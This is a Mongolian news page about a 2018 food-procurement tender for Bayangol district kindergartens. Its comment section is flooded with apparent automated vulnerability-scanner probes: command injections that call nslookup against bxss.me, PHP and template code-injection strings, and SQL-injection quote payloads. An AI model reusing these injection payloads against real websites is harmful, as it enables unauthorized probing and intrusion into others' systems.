Асгат ОНӨААТҮГ нь Баянгол дүүргийн төрийн өмчит цэцэрлэгүүдийн хүнсийг бэлтгэн нийлүүлэх зорилгоор Төрийн болон орон нутгийн өмчийн хөрөнгөөр бараа, ажил, үйлчилгээ худалдан авах тухай хуулийн дагуу 2018 оны Хүнсний түүхий эд, бүтээгдэхүүн худалдан авах нээлттэй болон харьцуулалтын тендерийг зохион байгуулаад байна.

Тус тендерийн урилгыг Tender.gov.mn  сайт, Өнөөдөр сонинд байршуулсан бөгөөд Асгат ОНӨААТҮГ-ын захиралын тушаалаар баталсан тендерийн комиссын гишүүд 2018 оны 01-р сарын 08-ны өдөр Нээлттэй тендерийн, 2018 оны 01-р сарын 23-ны өдөр Харьцуулалтын тендерийн хурлуудыг тус тус зохион байгуулав.

 

Сэтгэгдэл (38)

 • vptqibyt

  1

  2018-07-22 09:35:45
 • hwtcmgyk

  set|set&set

  2018-07-22 09:38:36
 • hwtcmgyk

  $(nslookup dns.ce.\045557.12-37.12.f111f.\1.bxss.me)

  2018-07-22 09:38:36
 • hwtcmgyk

  &nslookup dns.ce.\045557.12-38.12.f111f.\1.bxss.me&'\"`0&nslookup dns.ce.\045557.12-38.12.f111f.\1.bxss.me&`'

  2018-07-22 09:38:37
 • set|set&set

  1

  2018-07-22 09:38:38
 • $(nslookup dns.ce.\045557.12-43.12.f111f.\1.bxss.me)

  1

  2018-07-22 09:38:39
 • &nslookup dns.ce.\045557.12-44.12.f111f.\1.bxss.me&'\"`0&nslookup dns.ce.\045557.12-44.12.f111f.\1.bxss.me&`'

  1

  2018-07-22 09:38:39
 • mydacign

  ${9999414+9999961}

  2018-07-22 09:38:39
 • ${10000296+9999013}

  1

  2018-07-22 09:38:40
 • vptablwu

  )

  2018-07-22 09:38:41
 • vptablwu

  !(()&&!|*|*|

  2018-07-22 09:38:41
 • vptablwu

  ^(#$!@#$)(()))******

  2018-07-22 09:38:41
 • kvlecalt

  ;print(md5(acunetix_wvs_security_test));

  2018-07-22 09:38:42
 • kvlecalt

  ';print(md5(acunetix_wvs_security_test));$a='

  2018-07-22 09:38:43
 • kvlecalt

  ";print(md5(acunetix_wvs_security_test));$a="

  2018-07-22 09:38:43
 • )

  1

  2018-07-22 09:38:43
 • kvlecalt

  ${@print(md5(acunetix_wvs_security_test))}

  2018-07-22 09:38:43
 • !(()&&!|*|*|

  1

  2018-07-22 09:38:43
 • ^(#$!@#$)(()))******

  1

  2018-07-22 09:38:44
 • kvlecalt

  ${@print(md5(acunetix_wvs_security_test))}\

  2018-07-22 09:38:44
 • ;print(md5(acunetix_wvs_security_test));

  1

  2018-07-22 09:38:47
 • ';print(md5(acunetix_wvs_security_test));$a='

  1

  2018-07-22 09:38:47
 • ";print(md5(acunetix_wvs_security_test));$a="

  1

  2018-07-22 09:38:47
 • ${@print(md5(acunetix_wvs_security_test))}

  1

  2018-07-22 09:38:47
 • ${@print(md5(acunetix_wvs_security_test))}\

  1

  2018-07-22 09:38:48
 • emafuwum

  1

  2018-07-22 09:38:51
 • emafuwum

  1'"

  2018-07-22 09:38:51
 • emafuwum

  \

  2018-07-22 09:38:52
 • emafuwum

  @@oYQO1

  2018-07-22 09:38:52
 • emafuwum

  JyI=

  2018-07-22 09:38:52
 • emafuwum

  1

  2018-07-22 09:39:02
 • 1'"

  1

  2018-07-22 09:39:02
 • \

  1

  2018-07-22 09:39:02
 • @@zOAJu

  1

  2018-07-22 09:39:03
 • JyI=

  1

  2018-07-22 09:39:03
 • emafuwum

  1

  2018-07-22 09:39:12
 • ryuxpdpb

  1

  2018-07-22 09:41:34
 • ryuxpdpb

  1

  2018-07-22 09:41:34

Сэтгэгдэл үлдээх